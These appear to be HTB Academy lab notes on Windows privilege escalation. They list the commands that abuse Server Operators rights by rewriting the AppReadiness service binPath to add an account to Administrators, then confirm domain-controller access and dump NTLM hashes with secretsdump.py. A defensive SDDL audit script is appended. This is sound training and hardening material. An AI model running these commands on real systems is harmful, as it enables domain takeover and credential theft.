Server Operators

  • The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges.
    • It is a highly privileged group whose members can log in locally to servers, including Domain Controllers.
  • Query the AppReadiness service
    • sc.exe qc AppReadiness
    • Output shows SERVICE_START_NAME : LocalSystem
      • If it says LocalSystem, the service runs as SYSTEM. If it shows an account name (e.g., NT SERVICE\... or a user), it runs under that account instead.
  • Checking Service Permissions with PsService
    • c:\Tools\PsService.exe security AppReadiness
    • This confirms that the Server Operators group has SERVICE_ALL_ACCESS access right, which gives us full control over this service.
  • Checking Local Admin Group Membership
    • net localgroup Administrators
    • The target account (server_adm) is not listed
  • Modifying the Service Binary Path
    • sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
  • Starting the Service
    • sc.exe start AppReadiness
    • The start may fail with an error; this is expected, because cmd.exe is not a real service binary and never reports back to the Service Control Manager, but the command in binPath still runs
  • Confirming Local Admin Group Membership
    • net localgroup Administrators
    • The target account (server_adm) should now be listed
  • Confirming Local Admin Access on Domain Controller
    • nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'
  • Retrieving NTLM Password Hashes from the DC
    • secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
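A defender's audit of the condition that makes this path work, added here as an example and not part of the original notes: it parses the SDDL string that `sc.exe sdshow <service>` prints and flags any access-allowed ACE that grants SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or GENERIC_ALL to a principal other than SYSTEM or BUILTIN\Administrators. The descriptor below is constructed to mirror the finding above (Server Operators, SDDL alias SO, holding full access); the function and constant names are my own.

```python
import re

# Service access bits that let a principal change what a service runs, or
# change who controls it. Values follow the Win32 service-rights layout.
DANGEROUS_BITS = {
    0x00000002: "SERVICE_CHANGE_CONFIG",  # rewrite binPath, as in the notes above
    0x00040000: "WRITE_DAC",              # can grant itself any right
    0x00080000: "WRITE_OWNER",
    0x10000000: "GENERIC_ALL",
}
# SDDL two-letter right tokens that map onto those bits.
TOKEN_BITS = {"DC": 0x2, "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}
# Principals expected to hold these rights on any service.
TRUSTED_SIDS = {"SY", "BA"}   # LocalSystem, BUILTIN\Administrators
ACE_RE = re.compile(r"\(([^)]*)\)")

def rights_mask(rights: str) -> int:
    """SDDL rights field (hex like 0xF01FF, or tokens like CCDCLC...) -> bit mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    return sum(TOKEN_BITS.get(tok, 0) for tok in tokens)

def audit_service_sddl(service: str, sddl: str) -> list:
    """Return (service, principal, right) for every access-allowed ACE in the DACL
    that grants a dangerous right to a principal outside TRUSTED_SIDS."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)   # the DACL; ignore any SACL after S:
    if not m:
        raise ValueError("no DACL (D:) section in descriptor")
    findings = []
    for ace in ACE_RE.findall(m.group(1)):
        fields = ace.split(";")   # type;flags;rights;object_guid;inherit_guid;sid
        if len(fields) < 6 or fields[0] != "A":   # only access-allowed ACEs
            continue
        mask, sid = rights_mask(fields[2]), fields[5]
        if sid in TRUSTED_SIDS:
            continue
        for bit, name in DANGEROUS_BITS.items():
            if mask & bit:
                findings.append((service, sid, name))
    return findings

# Constructed descriptor in the shape `sc.exe sdshow AppReadiness` prints; the last
# DACL ACE gives Server Operators (SDDL alias SO) full access, as in the notes above.
VULNERABLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                   "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
                   "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
HARDENED_SDDL = VULNERABLE_SDDL.replace("(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)", "")

if __name__ == "__main__":
    for label, sddl in (("vulnerable", VULNERABLE_SDDL), ("hardened", HARDENED_SDDL)):
        print(label, audit_service_sddl("AppReadiness", sddl))
```

Run it against the output of `sc.exe sdshow` for each service on a Domain Controller to find the same condition the notes exploit; on a DC, Server Operators membership deserves the same review as Domain Admins.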